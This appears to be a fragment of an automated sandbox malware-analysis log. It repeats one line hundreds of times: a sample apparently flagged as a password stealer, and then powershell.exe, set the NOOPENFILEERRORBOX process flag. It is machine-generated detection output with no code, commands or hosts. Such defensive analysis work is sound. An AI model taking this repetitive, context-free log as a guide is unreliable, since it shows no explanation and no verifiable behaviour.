                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
